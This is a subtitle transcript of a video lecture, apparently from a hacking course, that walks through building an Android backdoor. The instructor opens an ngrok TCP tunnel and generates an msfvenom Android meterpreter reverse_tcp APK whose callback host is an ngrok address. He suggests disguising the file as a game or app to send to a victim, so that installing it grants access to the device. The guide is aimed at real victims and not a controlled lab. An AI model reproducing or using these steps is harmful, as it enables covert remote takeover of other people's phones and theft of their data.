1
00:00:00,300 --> 00:00:02,610
-: Hi, within this lecture

2
00:00:02,610 --> 00:00:04,800
we are going to be finally ready

3
00:00:04,800 --> 00:00:08,460
to create our backdoor for Android devices

4
00:00:08,460 --> 00:00:11,310
using these tunneling services.

5
00:00:11,310 --> 00:00:15,540
So if you go to the documentation of this ngrok.com

6
00:00:15,540 --> 00:00:18,030
you will see a lot of usages

7
00:00:18,030 --> 00:00:22,530
and a lot of commands that you can use, you can leverage,

8
00:00:22,530 --> 00:00:25,380
in your own environment.

9
00:00:25,380 --> 00:00:29,790
As you can see, in order to create some kind of connection,

10
00:00:29,790 --> 00:00:34,290
all you have to do is just specify the connection type

11
00:00:34,290 --> 00:00:37,650
and the connection port that you want to use.

12
00:00:37,650 --> 00:00:40,050
I'm going to show you what you can do

13
00:00:40,050 --> 00:00:43,230
or what you have to do in order to make this work.

14
00:00:43,230 --> 00:00:46,440
Don't worry, but if you want to use ngrok

15
00:00:46,440 --> 00:00:49,740
for some other special occasions later on

16
00:00:49,740 --> 00:00:52,800
make sure you read this documentation

17
00:00:52,800 --> 00:00:55,950
because it's very useful actually.

18
00:00:55,950 --> 00:00:59,820
For example, in here, they're trying to expose

19
00:00:59,820 --> 00:01:02,700
a web server on port 80

20
00:01:02,700 --> 00:01:05,580
of your local machine to the internet.

21
00:01:05,580 --> 00:01:09,210
And that is what we have seen in the previous lecture

22
00:01:09,210 --> 00:01:13,800
when we tried to start the web service of Apache.

23
00:01:13,800 --> 00:01:15,990
But that's not what we are going to do right now.

24
00:01:15,990 --> 00:01:20,520
We are going to use this for sending the connection

25
00:01:20,520 --> 00:01:23,310
from the Android to the ngrok.
26
00:01:23,310 --> 00:01:24,510
So in order to do that,

27
00:01:24,510 --> 00:01:26,700
of course we are going to use the same thing.

28
00:01:26,700 --> 00:01:31,170
I'm in my downloads folder one more time in my terminal

29
00:01:31,170 --> 00:01:36,170
and I'm writing ./ngrok tcp and a port number.

30
00:01:37,620 --> 00:01:41,160
So maybe you can think something like that.

31
00:01:41,160 --> 00:01:45,090
Yeah, you're talking about ports a lot of times

32
00:01:45,090 --> 00:01:48,630
during this training, but you didn't explain

33
00:01:48,630 --> 00:01:51,690
what a port is, and you're correct.

34
00:01:51,690 --> 00:01:55,590
So we are sending some requests and getting responses

35
00:01:55,590 --> 00:01:59,850
when we deal with internet operations in our daily life.

36
00:01:59,850 --> 00:02:04,050
So every connection, like going to google.com

37
00:02:04,050 --> 00:02:07,620
or receiving that connection from the Android phone,

38
00:02:07,620 --> 00:02:10,470
requires some sort of a gate,

39
00:02:10,470 --> 00:02:14,280
some sort of a port to be processed on.

40
00:02:14,280 --> 00:02:19,103
So every connection uses its own specified gate,

41
00:02:20,460 --> 00:02:25,460
like 80 for HTTP requests or, I don't know,

42
00:02:26,070 --> 00:02:31,020
22 for SSH requests, and for mail requests

43
00:02:31,020 --> 00:02:33,300
we have a lot of different ports;

44
00:02:33,300 --> 00:02:37,050
for some kind of other special services,

45
00:02:37,050 --> 00:02:40,020
special connections, we have other ports.

46
00:02:40,020 --> 00:02:44,580
So we have some respective gates, respective ports

47
00:02:44,580 --> 00:02:46,800
for different kinds of connections.

48
00:02:46,800 --> 00:02:51,800
And firewalls actually try to observe these gates,

49
00:02:53,130 --> 00:02:58,130
observe these ports, so that they won't be left open

50
00:02:58,560 --> 00:03:02,700
for any kind of incoming malicious connection.

51
00:03:02,700 --> 00:03:05,880
Okay? So we are going to use a port

52
00:03:05,880 --> 00:03:08,250
that no one else is using.

53
00:03:08,250 --> 00:03:12,540
Something like 4242 or any other thing like 5555.

54
00:03:13,500 --> 00:03:17,160
And if it doesn't work for you for some reason

55
00:03:17,160 --> 00:03:20,160
you may choose to use another port.

56
00:03:20,160 --> 00:03:24,210
For example, I'm going to write 4242 over here

57
00:03:24,210 --> 00:03:28,260
and since we do not have any kind of firewall

58
00:03:28,260 --> 00:03:31,260
in our Kali Linux, it should work fine.

59
00:03:31,260 --> 00:03:34,950
So I'm going to hit enter, and as you can see

60
00:03:34,950 --> 00:03:39,950
it started to work, and we are not going to come across

61
00:03:40,410 --> 00:03:43,830
any kind of firewalls in Android as well.

62
00:03:43,830 --> 00:03:48,300
So most of the time this 4242 will work out for you,

63
00:03:48,300 --> 00:03:51,873
but if it doesn't, just try 5555 or 6666, okay?

64
00:03:54,450 --> 00:03:58,380
So as you can see, it's now started

65
00:03:58,380 --> 00:04:02,340
and it's some kind of doing a forwarding operation,

66
00:04:02,340 --> 00:04:05,160
which is what we are looking for.

67
00:04:05,160 --> 00:04:10,160
As you can see, we are forwarding this tcp.ngrok.io

68
00:04:11,400 --> 00:04:14,640
with this port to our localhost.

69
00:04:14,640 --> 00:04:17,340
So this address and this port

70
00:04:17,340 --> 00:04:21,030
would be different for you, maybe different for you.

71
00:04:21,030 --> 00:04:26,030
I have 17197 over here, and in the localhost, of course,

72
00:04:27,020 --> 00:04:32,020
we have our specified port over here, like 4242.

73
00:04:32,520 --> 00:04:34,890
But this will change for you.

74
00:04:34,890 --> 00:04:37,080
But we are going to use this.

75
00:04:37,080 --> 00:04:40,770
So I'm going to use this as a localhost

76
00:04:40,770 --> 00:04:45,120
and a local port in my MSFvenom. Because why?
77
00:04:45,120 --> 00:04:49,050
Because remember, we want to direct the connection

78
00:04:49,050 --> 00:04:52,680
from the Android phone to the ngrok

79
00:04:52,680 --> 00:04:57,210
and then later on from the ngrok to our own localhost,

80
00:04:57,210 --> 00:05:01,770
to our own Kali Linux machine, using this service.

81
00:05:01,770 --> 00:05:05,730
So that is exactly what we are doing right now.

82
00:05:05,730 --> 00:05:08,940
So what I'm going to do, I'm going to give this

83
00:05:08,940 --> 00:05:13,589
as an input to LHOST and give the port

84
00:05:13,589 --> 00:05:17,340
as an input to the output in my MSFvenom.

85
00:05:17,340 --> 00:05:22,340
So you have to do exactly the same in order to succeed.

86
00:05:22,380 --> 00:05:24,960
So this would be different for you,

87
00:05:24,960 --> 00:05:27,810
even the address would be different for you.

88
00:05:27,810 --> 00:05:31,950
So make sure you copy your own, not mine.

89
00:05:31,950 --> 00:05:34,950
So over here I'm going to use this

90
00:05:34,950 --> 00:05:39,700
and I'm going to use 1797 as a port

91
00:05:40,590 --> 00:05:42,810
and this will receive the information

92
00:05:42,810 --> 00:05:46,920
and forward it to me once it comes.

93
00:05:46,920 --> 00:05:49,050
So don't close this down,

94
00:05:49,050 --> 00:05:53,880
just open a new tab from the file and say new tab, okay?

95
00:05:53,880 --> 00:05:57,960
Because if you close it down, the service will stop.

96
00:05:57,960 --> 00:06:02,960
So open a new tab and write the MSFvenom command

97
00:06:03,330 --> 00:06:05,460
that we have written before.

98
00:06:05,460 --> 00:06:08,730
So as a payload parameter, I'm going to specify

99
00:06:08,730 --> 00:06:13,730
Android meterpreter and then reverse TCP, okay?

100
00:06:15,130 --> 00:06:17,610
The reverse_tcp.
101
00:06:17,610 --> 00:06:22,260
And then later on we have to specify the LHOST

102
00:06:22,260 --> 00:06:24,660
and say equal to,

103
00:06:24,660 --> 00:06:29,660
and this will be equal to the 0.tcp.ngrok.io, I believe.

104
00:06:32,670 --> 00:06:35,063
And the LPORT will be 17197.

105
00:06:39,750 --> 00:06:42,873
So I'm just going to copy and paste those.

106
00:06:43,800 --> 00:06:48,180
0.tcp.ngrok.io, so it's easy, I can write that

107
00:06:48,180 --> 00:06:53,180
without forgetting, I suppose: 0.tcp.ngrok.io

108
00:06:56,040 --> 00:07:01,040
and then our port will be 17, let me see it, yeah, 17197.

109
00:07:06,960 --> 00:07:10,440
So 17197.

110
00:07:10,440 --> 00:07:13,410
Here we go, now we are okay.

111
00:07:13,410 --> 00:07:18,410
And then we specify where to put this payload,

112
00:07:18,720 --> 00:07:20,550
where to put this APK file

113
00:07:20,550 --> 00:07:23,970
that we have been trying to create.

114
00:07:23,970 --> 00:07:27,540
In order to do that, you can just write the results

115
00:07:27,540 --> 00:07:32,540
like -R and specify the folder that you want to put it in,

116
00:07:33,090 --> 00:07:37,740
so that you can access it easily and you can forward it.

117
00:07:37,740 --> 00:07:41,940
So I'm going to say R, okay, with a capital R,

118
00:07:41,940 --> 00:07:45,810
and say this greater-than sign; it means

119
00:07:45,810 --> 00:07:50,810
just write the result into this folder, into this location.

120
00:07:51,960 --> 00:07:56,960
Okay? So R > /root/downloads or documents

121
00:07:59,610 --> 00:08:03,750
or any other folder that you may want to put this in.

122
00:08:03,750 --> 00:08:07,440
So I'm going to say ngroktest.apk

123
00:08:07,440 --> 00:08:12,440
and I'm going to put it inside of my root folder directly.
124
00:08:12,570 --> 00:08:14,310
Of course, you are more than welcome

125
00:08:14,310 --> 00:08:17,160
to use another name for your APK,

126
00:08:17,160 --> 00:08:21,660
but don't forget to specify that APK extension

127
00:08:21,660 --> 00:08:23,340
at the end of this.

128
00:08:23,340 --> 00:08:25,380
I'm just going to call this test

129
00:08:25,380 --> 00:08:27,990
because we are testing it, okay?

130
00:08:27,990 --> 00:08:30,960
In a real-life example, it would be something like

131
00:08:30,960 --> 00:08:35,597
game.apk or, I don't know, supercoolapplication.apk

132
00:08:37,157 --> 00:08:40,770
'cause you are going to send it to the victim next.

133
00:08:40,770 --> 00:08:44,430
So here you go, I believe it's now created for us.

134
00:08:44,430 --> 00:08:49,430
Let me minimize this and let me go to the root folder.

135
00:08:50,010 --> 00:08:53,977
And here we go, we see the ngroktest.apk.

136
00:08:55,500 --> 00:08:57,660
So this is the exact file

137
00:08:57,660 --> 00:09:01,110
that we are going to send to the victim.

138
00:09:01,110 --> 00:09:04,830
And once the victim installs this

139
00:09:04,830 --> 00:09:08,730
we're going to get access to their own device.

140
00:09:08,730 --> 00:09:11,043
Let's do that in the next lecture.